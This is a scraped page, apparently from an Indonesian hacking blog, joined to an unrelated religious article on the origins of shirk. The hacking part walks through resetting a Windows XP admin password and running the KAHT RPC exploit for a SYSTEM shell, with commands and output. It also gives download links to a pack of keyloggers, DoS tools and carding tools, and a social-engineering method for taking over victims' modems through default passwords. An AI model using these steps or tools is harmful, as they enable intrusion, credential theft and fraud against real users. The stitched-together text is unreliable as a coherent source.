http://agungevi.wordpress.com/
http://indonesiacyber.net/ropix/
http://www.areakita.com/
http://www.awal85.com/
http://onotz.co.cc/
http://www.sahabatbambu.com/
http://www.keranjangiklan.com/
http://www.dwiprastya.com/
http://www.ilmuwebsite.com/rss_news.xml
http://www.ilmuwebsite.com/rss_php_kuliah.xml
http://www.ilmuwebsite.com/rss_php_tutorial.xml
http://www.ilmuwebsite.com/rss_hacking.xml
http://www.ilmuwebsite.com/
http://www.ilmuwebsite.com/news/
http://www.ilmuwebsite.com/php_kuliah/
http://www.ilmuwebsite.com/php_tutorial/
http://www.ilmuwebsite.com/php_reference/
http://www.ilmuwebsite.com/c_tutorial/
http://www.ilmuwebsite.com/html/
http://www.ilmuwebsite.com/javascript/
http://www.ilmuwebsite.com/search_engine_article/
http://www.ilmuwebsite.com/search_engine_tutorial/
http://www.ilmuwebsite.com/photoshop/
http://www.ilmuwebsite.com/coreldraw/
http://www.ilmuwebsite.com/flash/
http://www.ilmuwebsite.com/stockphoto/
http://www.ilmuwebsite.com/domain_registration/
http://www.ilmuwebsite.com/hosting_service/
http://www.ilmuwebsite.com/review_cms/
http://www.ilmuwebsite.com/review_software/
http://www.ilmuwebsite.com/hacking/
http://www.ilmuwebsite.com/linux/
http://www.ilmuwebsite.com/jaringan/
http://www.ilmuwebsite.com/gb/
http://www.ilmuwebsite.com/staff/
http://www.feedblitz.com/f/f.fbz?AddNewUserDirect
http://www.feedblitz.com/
http://www.feedblitz.com/f/?Sub=401124
http://extremetracking.com/open?login=ilmuwebs
http://www.ilmuwebsite.com/
http://www.ilmuwebsite.com/sitemap/
http://www.ilmuwebsite.com/sitemap2/
http://www.ilmuwebsite.com/sitemap3/
http://www.ilmuwebsite.com/staff/
http://www.ilmuwebsite.com/email/
http://www.ilmuwebsite.com/Privacy-Policy.html

Exploit Pass Win XP

Tekhnik Exploit Password WinXP

15-04-2007 | 20:29:13 | Halaman Ini dibaca 15989 kali

Kali ini saya akan mencoba untuk menjelaskan 2 teknik exploitasi pada windows XP, pertama melakukan pemanfaatan SAM files dan terakhir memanfaatkan RPC-nya Windows XP. Tekhnik kedua sebetulnya adalah kelanjutan dari artikelnya mRt di echo zine 10 yang membahas tentang Exploitasi Windows XP [pada fat32] dengan memanfaatkan sang Admin sendiri (hehuehuheue … ) dan batch file yang disisipkan di start|program|startup oleh sang kriminal , sedangkan kali ini yang saya bahas adalah jenis NTFS, yang tidak memiliki acces seperti pada fat32 untuk dapat menaruh batch file di folder start up nya sang Admin tersayang, sehingga apabila dipaksakan “Access Denied” adalah jawabannya. Apa akibatnya jika kita menggunakan kedua tekhnik diatas ?, yang jelas mah sama-sama buat orang seneng… heuheueehuhuehuee ! Jawab sendiri dah …

Tekhnik pertama :
Yang kita butuhkan sekarang adalah :
Petter Recovery Password yang bisa di download dari situsnya langsung http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html sekalian sama infonya aja, biasanya sudah di sediakan dalam bentuk rar yang bisa di jadikan bootdisk. Yang penulis pakai untuk experimen kali ini yaitu versi bd040818 terdapat 3 file di dalamnya yakni bd040818.bin , install.bat , rawrite2.exe .
1 buah disket kosong dan layak pakai. –> untuk disket boot Petter Recovery Password.
Nekatzzzz ….

Kasusnya begini, misalnya ….anggap saja kita lupa password untuk login winXP nya. : ) atau kasus yang laen aja kali ya, yang lebih menantang … hehehe. Misalnya ada rampok yang kebingungan nggak bisa login, padahal kompienya mo dijual … huehueueheue. Ada yang kesindir nggak nih ??? Udah ah bcanda mulu. Langsung aja deuh …

Langkah pertama … Setelah Petter Recovery Password di jadikan bootdisk, langsung saja booting dengan disket tersebut …
Langkah berikutnya, anda akan di tanya di drive mana SAM file berada. Tekan enter saja untuk defaultnya, setelah itu akan ditanyakan secara spesifik lagi, di direktori mana file SAM berada, biasanya untuk yang defaultnya tuh SAM file berada di /windows/system32/config, enter lagi aja untuk yang defaultnya. Setelah itu ……. Nah sampe disini anda akan di minta User mana yang ingin di ganti/hapus passwordnya. Lebih baik Administrators aja, karena yang kita lakukan saat ini kan mencari cara untuk menjadi SU di Windows XP. Biar gampang melakukan sesuatu nantinya …. hehehehe !!! Untuk eksperiment kali ini lebih baik anda membuat password Administrators menjadi blankpassword [* = blankpassword], supaya gampang nantinya, dan blankpassword merupakan pilihan terbaik dalam menggunakan Petter Password Recovery. Soalnya penulis sendiri telah belasan kali mencoba mengganti password para user dengan tetapi hanya 2 yang berhasil. Sudah ??? … siiiip, tekan ! untuk mengakhir sesi reset password, dan q untuk mengakhiri scripts tersebut. Selanjutnya anda akan di tanya kembali, ingin mengulang atau tidak. Lebih baik tidak lahhhh … Edit Completed. Catatan : Setelah menggunakan Petter Recovery Password, Windows berusaha untuk melakukan scandisk, system ne baru di acak-acak nie : ). Tunggu hingga proses scandisk selesai.
Setelah proses booting, anda akan di hadapkan dengan tampilan login yang seperti biasanya. ( Nggak menarik, hehehehe… ) Sekarang tekan ctrl+alt+del, tunggu sebentar dan kemudian tekan kembali ctrl+alt+del. Nah ada tampilan login yang clasic, seperti di windows 98 dulu. Dengan 2 textbox…
————————————————-
| Log On to Windows                         | x |
————————————————-
| User Name : Al-k                              |
| Password : ******                             |
|                                               |
| | Ok | | Cancel | | BLABLABLABLA….|         |
————————————————-

Ya, bentuknya kira-kira seperti diatas … : )…
Setelah itu ganti usernamenya menjadi Administrator, passwordnya di kosongkan saja, karena sebelumnya kita telah menjadikan blankpassword pada Administrator. Ok. Jreng-jreng-jreng… sekarang anda menjadi super user kembali. Silahkan buat account untuk anda sendiri.

Tekhnik Kedua :
Tiba saatnya kita maju bersama … , memanfaatkan Massive RPC WinXP yang bobrok. Tekhnik kedua ini dibuat untuk para user yang memiliki acces limited. Yang dibuat kesal oleh sang admin, sehingga untuk menginstall suatu software harus minta izin dari sang Admin. . Yang dibutuhkan hanyalah acces untuk masuk ke command shell, dan satu tool kecil ‘kaht’ . Siap ???… buka command promptnya …

C:\Documents and Settings\Al-k>net user

User accounts for \\NOMATTER
  -------------------------------------------------------------------------------
  Administrator Al-k GNU-- keluarga --
  Guest HelpAssistant SUPPORT_388945a0
  VUSR_NOMATTER
  The command completed successfully.

// Anggap saja disini Al-k adalah user yang limited
// Setelah itu masuk ke direktori di mana kaht berada

D:\Data+ku_>

Kemudian kita test dulu kaht-nya… bisa nggak nih kita nge-root.

  D:\Data+ku_>kaht 127.0.0.0 127.0.0.3
_________________________________________________

  KAHT II - MASSIVE RPC EXPLOIT
  DCOM RPC exploit. Modified by aT4r@3wdesign.es
  #haxorcitos && #localhost @Efnet Ownz you!!!
  FULL VERSION?   - AUTOHACKING
  ________________________________________________

 [+] Targets: 127.0.0.0-127.0.0.3 with 50 Threads
 [+] Attacking Port: 135. Remote Shell at port: 34522
 [+] Scan In Progress...
  - Connecting to 127.0.0.2

  Sending Exploit to a [WinXP] Server...
  - Conectando con la Shell Remota...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Tuh kan dapet deh akses rootnya. Jangan seneng dulu. Langsung aja kita
 buat akses user yang terbatas tadi menjadi Super User. 

C:\WINDOWS\system32> net localgroup Administrators Al-k /add

  The command completed successfully.

Selanjutnya anda bisa login dengan user yang baru saja dirubah accountnya tadi. Dan anda bisa login ke account user lain yang memiliki akses sama seperti Administrator, tentunya dengan menghilangkan password user tersebut dulu sebelumnya. Dan anda bisa masuk ke regedit untuk menutup perizinan user account pada control panel :

HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/DisallowCpl/

, buat string baru dengan nama 1 dan ubah valuenya menjadi nusrmgr.cpl
Dan bisa anda disable akses ke command prompt kepada semua user. Sehingga anda menjadi SU yang benar-benar otoriter. Sayangnya tekhnik yang kedua ini hanya bisa di lakukan di Windows XP Service Pack 1. : (
// Refferensi :
- Seni Tekhnik Hacking 1 [S’to]
- Echo Zine 10, Exploitasi Windows XP [mRt]
- Iseng Instink

// Greetz :
- y3dips, Lirva32, z3r0byte ( Arabic Man ), the_day, S’to [duuh masuk TV tuk
yang kesekian kalinya nih ???] . & Echo staff who can’t mentioned 1 by 1.
- Alumni SMAN4 Bogor & All guy’s in STTTelematika Ciawi Bogor.
- Special for Jheseecka & Melati “Mel, ini artikel ke 1 dan ke 2-nya !!! “
- hg_ , Fel_c, Mentari^, the aeh, zacx, Azwa, Sita, Dulleh, Ibonx, weww, Qank-qunk,
AK47-angga, ninjaring
- Allguys in #yogyafree, Echo Member, #khilafah, #pribumi, #e-c-h-o, #freebase

Cd hack Gratis

CD Hacking Tools 2007 – Gratis

26-09-2007 | 19:32:11 | Halaman Ini dibaca 48359 kali

CD Hacking Tools ( Mirror was Updated )

XxxPass-Team 2007
Danger Cracking & Hacking Tools – Ver 1.0

- Exploit Collection (4 Tools)
- Google Hacking (4 Tools)
- Keyloggers (5 Tools)
- Binder & Packer (15 Tools)
- Flood_DOS (20 Tools)
- Messenger (11 Tools)
- Bruter (9 Tools)
- Anonimity (1 Tool)
- !!! $$$ !!! (13 Tools)
- AIO

Exploit Collection

1. 10377 Exploit
2. SMF ShoutBox Xss & HTML Injection
3. SMF Ultimate Shoutbox Cookie Disclosure Exploit
4. Firefox_BuG

Messenger

1. MSN Extreme 3.0
2. MSN Spy Lite v1.0
3. Yahoo Hack!
4. Hotmail Email Hacker
5. Hotmail Hacker Gold
6. HotmailHack
7. YahooUltraCracker
8. winks,moods,mugins,weemees and meegos + Installer
9. MSN Messenger Account Cracker v2.0
10. SH Yahoo Pass Sender 1.1
11. Yahoo Password Decoder

Google Hacking

1. Alt GooGle
2. Google Version 1.2
3. Google H4ck3r (3 programs)
4. GooLink

Keyloggers

1. Elgolf 1.0 Beta
2. ESK KeyLogger
3. Glog Keylogger
4. HermanAgent
5. IKlogger0.1

Bbruter

1. WebCrack v4.0
2. Brutus
3. Crack FTP
4. FTP Brute Hacker
5. phpbb bruteforcer
6. PhpBB Pass Extractor
7. phpBB Cracker
8. Email Cracker
9. FTP Brute Forcer

!!! $$$ !!!

1. Cmaster
2. CC Verify
3. CWizard
4. THCC
5. Visa Card Generator 06
6. Carcabot_Mass_Email
7. CcHack
8. CC-Fake
9. cvv2c
10. DesertCVV2
11. id-fake
12. Paypal-Link-Spoofed
13. HoW to get Credit Cards Fresh and Fastest

AIO

1. Uploader for All
2. Cool Small Usefull Dp

Flood DOS

1. Flowbabeflow
2. FreeSiteKiller V 2.01
3. Webxgrab
4. Web Attacker ENG
5. TheRapist-Dos Attacker
6. HybridFlood2
7. Ati-russ 3.0
8. Http Bomber v1.001b
9. Sprut
10. DoS_5
11. etherflood
12. DoSAttacker
13. phpBB Dos
14. phpBB Attacker
15. Ping Attack
16. Site Nuke
17. Divine Intervention
18. UC Forum Spammer
19. Inferno Nuker
20. Multiple Site Flood

Silahkan di download di :

http://rapidshare.com/files/24341192/XxxPass-C_H_Ver1.0-_2007-part1.rar.html
http://rapidshare.com/files/24350769/XxxPass-C_H_Ver1.0-_2007-part2.rar.html
Pass : XxxPass_DJ_haselking

Mirror di tempat lain ( Tambahan dari Mas Yudhie — Terima kasih banyak Mas )
http://www.cocosunroofs.com/bbs/configs/free/inc0mp13te/XxxPass-C_H_Ver1.0-_2007-part1.rar
http://www.cocosunroofs.com/bbs/configs/free/inc0mp13te/XxxPass-C_H_Ver1.0-_2007-part2.rar
Pass : XxxPass_DJ_haselking

Hack … hack … hack the World !!
( Just for lamerz )

Tutorial hacking

Lagi-lagi video hacking bertebaran secara gratis. Yup, baru-baru ini ilmuwebsite staff menemukan harta karun luar biasa, video hacking academy, mulai dari Ethical Hacking, Penetration Testing, Footprinting, Reconnaissance, TCP IP Basics ,Scanning, Honeypots, Honeynets sampai dengan wireless hacking pun dibahas dalam video. Yang lebih menarik lagi, didalamnya di sediakan demo penetration testing lebih dari 300+ vulnerability. —- dan tentunya sebanding dengan kapasitasnya yang lebih dari 3 GB.

Silahkan bagi yang tertarik untuk mendownloadnya :

-Training Module 1 Ethical Hacking and Penetration Testing – cd 1 – 250 mb
http://rapidshare.com/files/6870957/traininga.part1.rar.html
http://rapidshare.com/files/6875509/traininga.part2.rar.html
http://rapidshare.com/files/6880184/traininga.part3.rar.html
http://rapidshare.com/files/6884786/traininga.part4.rar.html
http://rapidshare.com/files/6889797/traininga.part5.rar.html
http://rapidshare.com/files/6890170/traininga.part6.rar.html
————————————————————
-Training Module 2 Footprinting and Reconnaissance – cd 2 – 210 mb

http://rapidshare.com/files/6920123/trainingb.part1.rar.html
http://rapidshare.com/files/6925380/trainingb.part2.rar.html
http://rapidshare.com/files/6930474/trainingb.part3.rar.html
http://rapidshare.com/files/6935598/trainingb.part4.rar.html
http://rapidshare.com/files/6937268/trainingb.part5.rar.html
————————————————————
-Training Module 3 TCP IP Basics and Scanning – cd 3 – 153 mb

http://rapidshare.com/files/6950222/trainingc.part1.rar.html
http://rapidshare.com/files/6954540/trainingc.part2.rar.html
http://rapidshare.com/files/6958405/trainingc.part3.rar.html
http://rapidshare.com/files/6958651/trainingc.part4.rar.html
————————————————————
-Training Module 4 Enumeration and Verification – cd 4 – 200 mb

http://rapidshare.com/files/6995889/trainingd.part1.rar.html
http://rapidshare.com/files/6999123/trainingd.part2.rar.html
http://rapidshare.com/files/7002551/trainingd.part3.rar.html
http://rapidshare.com/files/7005909/trainingd.part4.rar.html
http://rapidshare.com/files/7006074/trainingd.part5.rar.html
————————————————————
-Training Module 5 Hacking Defending Wireless Modems – cd 5 – 94 mb

http://rapidshare.com/files/7017480/traininge.part1.rar.html
http://rapidshare.com/files/7021255/traininge.part2.rar.html
————————————————————
-Training Module 6 Hacking Defending Web Servers – cd 6 – 150 mb

http://rapidshare.com/files/7029199/trainingf.part1.rar.html
http://rapidshare.com/files/7034545/trainingf.part2.rar.html
http://rapidshare.com/files/7039580/trainingf.part3.rar.html
http://rapidshare.com/files/7040200/trainingf.part4.rar.html
————————————————————
-Training Module 7 Hacking Defending Web Applications – cd 7 – 110 mb

http://rapidshare.com/files/7049302/trainingg.part1.rar.html
http://rapidshare.com/files/7054559/trainingg.part2.rar.html
http://rapidshare.com/files/7056051/trainingg.part3.rar.html
————————————————————
-Training Module 8 Sniffers and Session Hijacking – cd 8 – 115 mb

http://rapidshare.com/files/7069844/trainingh.part1.rar.html
http://rapidshare.com/files/7076146/trainingh.part2.rar.html
http://rapidshare.com/files/7084439/trainingh.part3.rar.html
————————————————————
-Training Module 9 Hacking Defending Windows Systems – cd 9 – 120 mb

http://rapidshare.com/files/7090868/trainingi.part1.rar.html
http://rapidshare.com/files/7095821/trainingi.part2.rar.html
http://rapidshare.com/files/7097885/trainingi.part3.rar.html
————————————————————
-Training Module 10 Hacking Defending Unix Systems – cd 10 – 150 mb

http://rapidshare.com/files/7136591/trainingJ.part1.rar.html
http://rapidshare.com/files/7139658/trainingJ.part2.rar.html
http://rapidshare.com/files/7142501/trainingJ.part3.rar.html
————————————————————
-Training Module 11 Rootkits Backdoors Trojans Tunnels – cd 11 – 115 mb

http://rapidshare.com/files/7147118/trainingk.part1.rar.html
http://rapidshare.com/files/7159091/trainingk.part2.rar.html
http://rapidshare.com/files/7160611/trainingk.part3.rar.html
————————————————————
-Training Module 12 Denial of Service and Botnets – cd 12 – 100 mb

http://rapidshare.com/files/7182977/trainingL.part1.rar.html
http://rapidshare.com/files/7187533/trainingL.part2.rar.html
————————————————————
-Training Module 13 Automated Pen Testing Tools – cd 13 – 102 mb

http://rapidshare.com/files/7202752/trainingm.part1.rar.html
http://rapidshare.com/files/7208149/trainingm.part2.rar.html
http://rapidshare.com/files/7208549/trainingm.part3.rar.html
————————————————————
-Training Module 14 Intrusion Detection Systems – cd 14 – 140 mb

http://rapidshare.com/files/7224433/trainingn.part1.rar.html
http://rapidshare.com/files/7230417/trainingn.part2.rar.html
http://rapidshare.com/files/7234950/trainingn.part3.rar.html
————————————————————
-Training Module 15 Firewalls – cd 15 – 160 mb

http://rapidshare.com/files/7252545/trainingo.part1.rar.html
http://rapidshare.com/files/7255895/trainingo.part2.rar.html
http://rapidshare.com/files/7258850/trainingo.part3.rar.html
http://rapidshare.com/files/7259491/trainingo.part4.rar.html
————————————————————
-Training Module 16 Honeypots and Honeynets – cd 16 – 120 mb

http://rapidshare.com/files/7262593/trainingp.part1.rar.html
http://rapidshare.com/files/7265259/trainingp.part2.rar.html
http://rapidshare.com/files/7266075/trainingp.part3.rar.html
————————————————————
-Training Module 17 Ethics and Legal Issues – cd 17 – 90 mb

http://rapidshare.com/files/7268140/trainingq.part1.rar.html
http://rapidshare.com/files/7269823/trainingq.part2.rar.html
————————————————————

Password = jL4XyiI7MxX3afM0

hack Speedy Telkom

Hacking Modem Speedy dan Penanganannya

09-08-2007 | 08:37:52 | Halaman Ini dibaca 15838 kali
Sebenarnya sudah lama sekali telkom mengadakan diskon besar-besaran untuk meraih pelanggan sebanyak-banyaknya. Udah dulu promosinya.

Sama dengan bug-bug yang lainnya, konfigurasi default akan membuat pihak luar yang tidak diinginkan seperti cracker dengan mudah mengeksploitasi secara besar-besaran sehingga memanen username dan password menjadi sesuatu yang memungkinkan sekali untuk dilakukan. Contoh bug yang buruk, yaitu username default dan password yang default.

Sebelum ngejabarin masalah teknisnya, berikut alat-alat yang diperlukan :
Browser Internet ( mau yang banyak bugnya, maupun yang sedikit bugnya )

Website dengan log system flat file ( diambil dari artikelnya Anggi J. )

Aplikasi Instant Messaging, ex : Yahoo Messenger ( Social Engineering )

Internet Password Asterisk Reveal

( http://www.nsauditor.com/freeware/downloads/IEAstRecover.exe )
Langkah Pertama

Silahkan anda baca artikel http://www.ilmuwebsite.com/detil_php_tutorial/2/_Membuat_System_LOG_dengan_FLAT_FILE/
, cara memasang log system flat file. Digunakan untuk mendapatkan alamat ip dari sang korban.
Langkah Ke Dua

Inti dari artikel ini adalah pencarian user yang akan dijadikan korban. Anda bisa menggunakan aplikasi IRC ataupun instant messaging yang lainnya. Alangkah baiknya anda menggunakan aplikasi IRC, seperti mIRC ataupun yang lainnya, karena fasilitas whois yang ada didalamnya mempermudah kita untuk segera mengetahui IP sang korban, tapi pada beberapa kasus, adakalanya user yang advanced menggunakan anonymous proxy yang tentunya menyembunyikan IP asli miliknya. Sehingga perlu teknik social engineering yang lebih ampuh lagi. Berikut ada sedikit percakapan antara seseorang sebagai intruder dengan sang korban menggunakan aplikasi yahoo messenger :
Mamang (intruder) : dah liat situs ini belom, ilmuwebsite.com ???

Sang_korban : apaan tuh ?

Mamang (intruder ) : situs keren punya orang keren, ngebahas tentang berbagai artikel mengenai kekerenan. Coba deh liat.

Sang_korban : coba, gw liat dulu. # kena!!

Mamang ) intruder ) : gimana keren kan ? eh, gw off dulu yah. C U
Situs ilmuwebsite.com tersebut, merupakan sebuah contoh situs yang anda gunakan untuk merecord ip sang korban. Anda bisa memasang log system flat file pada situs milik anda. Dengan mengusahakan sang korban tertarik untuk mengunjungi situs yang telah dipasang log system flat file.

Contoh IP yang sudah dilog dalam flat file,
Waktu: Fri, 06 Jul 2007 12:47:04 +0700 | IP asli: 125.161.2.85 | Browser: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)  | URL: / | Referrer: | Proxy:  | Koneksi:

Langkah Ketiga

Setelah mendapatkan alamat ip sang korban, yang perlu anda lakukan adalah membuka browser, kemudian pada address bar isi dengan alamat ip yang telah anda dapatkan, sebagai contoh yang saya dapatkan adalah http://125.160.#.# isikan username dengan admin dan passwordnya admin. Jika anda beruntung, anda akan langsung dihadapkan kepada halaman username ADSL dan tentunya password yang asterisk. Untuk membuka password yang asterisk, anda cukup menggunakan Internet Password Asterisk Reveal.

Penanganan

Sebenarnya dengan mengganti password yang default pun itu sudah bisa mencegah teknik seperti ini. Dan intinya password yang kuatlah yang susah untuk dimanfaatkan. Password yang kuat ini memiliki lebih dari 8 digit, dan merupakan gabungan dari angka huruf dan special character. Ex: ilmVw3851te –> bentuk lain dari ilmuwebsite
Sayangnya, telkom telah menerapkan system yang unique, sehingga account speedy tidak bisa digunakan pada jaringan telepon yang berbeda. Dan tentunya anda tidak bisa men-take over account yang sudah didapatkan. Mohon Maaf, artikel ini hanya sebagai contoh pembelajaran.

Default password untuk setiap modem :

http://www.elitehackers.info/defaultpasslist.php

// Greetz :
Special for mylovely, terima kasih infonya, ide-nya jadi makin bertambah.

Bscorpio, phii, dan ryuzaki, ninjaring, barudak STTTelematika Ciawi Bogor.

Fel_c, Mentari^, Abang Dennis the Manace

Allguys Echo Member, #khilafah, pepei dwipangga dan konco-konconya di liberationyouth.com, anak-anak saveusgue

The Origins of Shirk

From that which has been established in the Sharee’ah (prescribed law) is that mankind was – in the beginning – a single nation upn true Tawheed, then Shirk (directing any part or form of worship, or anything else that is solely the right of Allah, to other than Allah) gradually overcame them. The basis for this is the saying of Allah – the Most Blessed, the Most high:

“Mankind was one Ummah, then Allah sent prophets bringing good news and warnings.” (Surah Baqarah 2:213)

Ibn ‘Abbas - radiallaahu ‘anhu – said:

“Between Nooh (Noah) and Adam were ten generations, all of them were upon Sharee’ah (law) of the truth, then they differed. So Allah sent prophets as bringers of good news and as warners”(1)

Ibn ‘Urwah al-Hanbalee (d.837 H) said:

“This saying refutes those historians from the People of the Book who claim that Qaabil (Cain) and his sons were fire-worshippers”(2)

I say: In it is also a refutation of some of the philosophers and athists who claim that the (natural) basis of man is Shirk, and that Tawheed evolved in man! The preceeding aayah (verse) falsifies this claim, as do the two following authentic hadith:

Firstly:His (the prophet (sallallaahu `alaihi wasallam) ) saying that he related from his Lord (Allah) : “I created all my servants upon the true Religion (upon Tawheed, fre from Shirk). Then the devils came to them and led them astray from their true Religion. They made unlawful to people that which I had made lawful for them, and they commanded them to associate in worship with Me, that which I had sent down no authority.”(3)

Secondly:His (the prophet (sallallaahu `alaihi wasallam) ) saying: ” Every child is born upon the Fitrah(4) but his parents make him a jew or a christian or a magian. It is like the way an animal gives birth to a natural offspring. have you noticed any born mutilated, before you mutilate them.”

Abu Hurayrah said: Recite if you wish: “Allah’s fitrah with which He created mankind. There is to be no change to the creation (Religion) of Allah.”(Surah ar-Rum 30:30)(5)

After this clear explanation, it is of the upmost importance for the Muslim to know how Shirk spread amongst the believers, after they were muwahhideen (people upon Tawheed)

Concerning the saying of Allah – the most perfect – about the people of Nooh:

“And they have said : You shall not forsake your gods, nor shall you forsake Wadd, nor Suwaa’, nor Yaghooth, nor Ya’ooq, nor Nasr.”
(Surah Nooh 71:23)

It has been related by a group from the Salaf (Pious Predecessors), in many narrations, that these five deities were righteous worshippers. However, when they died, Shaytaan (Satan) whispered into their people to retreat and sit at their graves. Then Shaytaan whispered to those who came after them that they should take them as idols, beautifying to them the idea that you will be reminded of them and thereby follow them in righteous conduct. Then Shaytaan suggested to the third generation that they should worship these idols besides Allah – the most high – and he whispered to them that this is what their forefathers used to do!!!

So Allah sent to them Nooh (as), commanding them to worship Allah alone. However none responded to hiscall except a few. Allah – the mighty and majestic – related this whole incident in surah Nooh

Ibn ‘Abbas relates:

“Indeed these five names of righteous men from the people of Nooh. When they died Shataan whispered to their people to make statues of them and to place these statues in their places of gathering as a reminder of them, so they did this.

However, none from amongst them worshipped these statues, until when they died and the purpose of the statues was forgotten. Then (the next generation) began to worship them.”(6)

The likes of this has also been related by Ibn Jareer at-Tabaree and others, from a number of the salaf (Pious Predecessors) - radiallaahu ‘anhum.

In ad-Durral-Manthoor (6/269):

‘Abdullaah ibn Humaid relates from Abu Muttahar, who said: Yazeed ibn al-Muhallab was mentioned to Abu Ja’far al-Baaqir (d.11H), so he said: He was killed at the place where another besides Allah was first worshipped. Then he mentioned Wadd and said:

“Wadd was a Muslim man who was loved by his people. When he died, the people began to gather around his grave in the land of Baabil (Babel), lamenting and mourning. So when Iblees (Satan) saw them mourning and lamenting over him, he took the form of a man and came to them, saying : I see that you are mourning and lamenting over him. So why don’t you make a picture of him (i.e. a statue) and place it in your places of gatherings so that you maybe reminded of him. So they said: Yes, and they made a picture of him and put in their place of gathering; which reminded them of him.

When Iblees saw how they were (excessively) remembering him, he said : “Why doesn’t every man amongst you make a similar picture to keep in your own houses, so that you can be (constantly) reminded of him.”

So they all said “yes”. So each household made a picture of him, which they adored and venerated and which constantly reminded them of him.

Abu Ja’far said: “Those from the later generation saw what the (pevious generation) had done and considered that……..to the extent that they took him as an ilah (diety) to be worshipped besides Allah. He then said :” This was the first idol worshipped other than Allah, and they called this idol Wadd“(7)

Thus the wisdom of Allah – the Blessed, the Most High – was fufilled, when he sent Muhammed (sallallaahu `alaihi wasallam) as the final prophet and made his Sharee’ah the completion of all divinely Prescribed Laws, in that He prohibited all means and avenues by which people may fall into Shirk - which is the greatest of sins.

For this reason, building shrines over graves and intending to specifically travel to them, taking them as places of festivity and gathering and swearing an oath by the inmate of a grave; have all bee prohibited.

All of these lead to excessiveness and lead to the worship of other than Allah – the Most High. This being the case even more so in an age in which knowledge is diminishing, ignorance is increasing, thre are few sincere advisors ( to the truth) and shaytaan is co-operating with men and jinn to misguide mankind and to take them away from the worship of Allah alone – the Blessed, the Most High.

Notes

(1) Tahdheerus-Saajid min Ittikhaadhil-Quboori Masaajid (pp.101-106)
(2) Related by Ibn Jareer at-Tabaree in his tafseer (4/275) and al-Haakim (2/546) who said: “It is authentic according to the criterion of al-Bukhari.” Adh-Dhahabee also agreed.
(3) Al-Khawaakibud-Duraaree fee Tarteeb Musnadul-Imaam Ahmad’alaa Abwaabil-Bukhaaree (6/212/1), still in manuscript form.
(4) Related by Muslim (8/159) and Ahmad (4/162) from ‘Iyaadh ibn Himaar al-Mujaashi’ee radiallaahu ‘anhu
(5) [From the Editors] Ibn-al-Atheer said in an-Nihaayah (3/457): “Al-Fitr: means to begin and create, and al-Fitrah is the condition resulting from it. The meaning is that mankind were born upona disposition and a nature which is ready to accept the true Religion. So if he were to be left upon this, then he would continue upon it. However, those who deviate from this do so due to following human weaknesses and blind following of others…..”
Al-Haafidh Ibn Hajar said in Al-Fath (3/248): “The people differ concerning what is meant by al-Fitrah and the most famous saying is that it means Islam. Ibn ‘abdul-Barr said: That is what was well known with most of the salaf (pious predecessors), and the scholars of tafseer are agreed that what is meant by the saying of Allah – the Most High - “Allah’s fitrah with which He created mankind.” is Islam
(6) Related by Al-Bukhaaree (11/418) and Muslim (18/52)
(7) Realted by al-Bukhaaree (8/534)
(8) Related by Ibn Abee Haatim also, as is in al-Kawaakibud-Duraaree (6/112/2) of Ibn ‘Urwah al-Hanbalee, along with an isnaad which is Hasan, up to Abu Muttahar. However, no biography could be found for him, neither in ad-Dawlaabee’s al-Kunaa wal-Asmaa, nor Muslim’s al-Kunaa, nor any one elses. And the hidden defect here is that he is from the Shee’ah, but his biography is not included in at-Toosee’s al-Kunaa — from the index of Shee’ah narrators

---